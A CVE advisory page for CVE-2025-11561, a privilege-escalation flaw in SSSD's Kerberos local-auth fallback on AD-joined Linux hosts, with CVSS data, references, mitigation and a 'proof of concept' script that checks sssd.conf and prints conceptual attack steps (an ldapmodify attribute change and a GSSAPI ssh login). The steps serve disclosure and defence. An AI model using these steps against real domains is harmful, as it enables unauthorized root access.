Security Vulnerability Report
CVE-2025-11561 CVSS 8.8 HIGH

CVE-2025-11561

Published: 2025-10-09 14:15:54
Last Modified: 2026-04-15 00:35:42

Description

A flaw was found in the integration of Active Directory and the System Security Services Daemon (SSSD) on Linux systems. In default configurations, the Kerberos local authentication plugin (sssd_krb5_localauth_plugin) is enabled, but a fallback to the an2ln plugin is possible. This fallback allows an attacker with permission to modify certain AD attributes (such as userPrincipalName or samAccountName) to impersonate privileged users, potentially resulting in unauthorized access or privilege escalation on domain-joined Linux hosts.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Red Hat Enterprise Linux 8 (SSSD-related components)
Red Hat Enterprise Linux 9 (SSSD-related components)
Red Hat Enterprise Linux 10 (SSSD-related components)
All Linux distributions that use the default SSSD configuration with sssd_krb5_localauth_plugin enabled

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11561 PoC - SSSD Kerberos Local Auth Plugin Privilege Escalation
# This PoC demonstrates the concept of exploiting the sssd_krb5_localauth_plugin
# fallback to an2ln plugin for impersonating privileged users.
# Prerequisites:
# - Valid AD account with write permission to userPrincipalName or samAccountName
# - Target Linux host joined to AD domain via SSSD
# - Default SSSD configuration with sssd_krb5_localauth_plugin enabled
import glob
import os
import sys


def check_sssd_config():
    """Check if sssd_krb5_localauth_plugin is enabled and an2ln fallback exists"""
    config_paths = [
        "/etc/sssd/sssd.conf",
        "/etc/sssd/conf.d/"
    ]
    for path in config_paths:
        # A directory entry is expanded to the files it contains;
        # opening the directory itself would raise IsADirectoryError.
        if os.path.isdir(path):
            files = sorted(glob.glob(os.path.join(path, "*")))
        else:
            files = [path]
        for name in files:
            try:
                with open(name, 'r') as f:
                    content = f.read()
            except OSError:
                # Missing or unreadable file: skip it
                continue
            if "sssd_krb5_localauth_plugin" in content:
                print(f"[+] Found SSSD config at {name}")
                if "an2ln" in content:
                    print("[!] an2ln fallback plugin detected - VULNERABLE")
                    return True
    return False


def exploit_concept():
    """
    Conceptual exploit steps:
    1. Modify AD user attributes (userPrincipalName/samAccountName) to a value
       that triggers an2ln fallback
    2. The malicious attribute value should resolve to a privileged local user
       (e.g., 'root')
    3. When the modified user authenticates via Kerberos on Linux,
       sssd_krb5_localauth_plugin falls back to an2ln
    4. an2ln maps the crafted value to the privileged local username
    5. Authentication succeeds with elevated privileges
    """
    print("[*] CVE-2025-11561 Exploitation Concept")
    print("[*] Step 1: Verify target is vulnerable")
    if not check_sssd_config():
        print("[-] Target does not appear vulnerable")
        sys.exit(1)
    print("[*] Step 2: Modify AD user attributes via LDAP/ADSI")
    print(" Example using ldapmodify:")
    print(' dn: CN=victim,CN=Users,DC=domain,DC=com')
    print(' changetype: modify')
    print(' replace: userPrincipalName')
    print(' userPrincipalName: [email protected]')
    print("[*] Step 3: Trigger Kerberos authentication on target Linux host")
    print(" ssh -o GSSAPIAuthentication=yes user@target_host")
    print("[*] Step 4: Verify privilege escalation")
    print(" id # Should show root or privileged user")


if __name__ == "__main__":
    exploit_concept()

# Mitigation: Apply Red Hat security updates:
# RHSA-2025:19610, RHSA-2025:19847, RHSA-2025:19848, RHSA-2025:19849, RHSA-2025:19850
# Or disable sssd_krb5_localauth_plugin in sssd.conf

References

Raw JSON Data

JSON
{"cve": {
  "id": "CVE-2025-11561",
  "sourceIdentifier": "[email protected]",
  "published": "2025-10-09T14:15:54.447",
  "lastModified": "2026-04-15T00:35:42.020",
  "vulnStatus": "Deferred",
  "cveTags": [],
  "descriptions": [
    {"lang": "en", "value": "A flaw was found in the integration of Active Directory and the System Security Services Daemon (SSSD) on Linux systems. In default configurations, the Kerberos local authentication plugin (sssd_krb5_localauth_plugin) is enabled, but a fallback to the an2ln plugin is possible. This fallback allows an attacker with permission to modify certain AD attributes (such as userPrincipalName or samAccountName) to impersonate privileged users, potentially resulting in unauthorized access or privilege escalation on domain-joined Linux hosts."}
  ],
  "metrics": {"cvssMetricV31": [
    {"source": "[email protected]", "type": "Secondary",
     "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"},
     "exploitabilityScore": 2.8, "impactScore": 5.9}
  ]},
  "weaknesses": [
    {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}
  ],
  "references": [
    {"url": "https://access.redhat.com/errata/RHSA-2025:19610", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2025:19847", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2025:19848", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2025:19849", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2025:19850", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2025:19851", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2025:19852", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2025:19853", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2025:19854", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2025:19859", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2025:20954", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2025:21020", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2025:21067", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2025:21329", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2025:21795", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2025:22256", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2025:22265", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2025:22277", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2025:22529", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2025:22548", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2025:22724", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2025:23113", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2026:0316", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2026:0677", "source": "[email protected]"},
    {"url": "https://access.redhat.com/security/cve/CVE-2025-11561", "source": "[email protected]"},
    {"url": "https://blog.async.sg/kerberos-ldr", "source": "[email protected]"},
    {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402727", "source": "[email protected]"},
    {"url": "https://github.com/SSSD/sssd/issues/8021", "source": "[email protected]"}
  ]
}}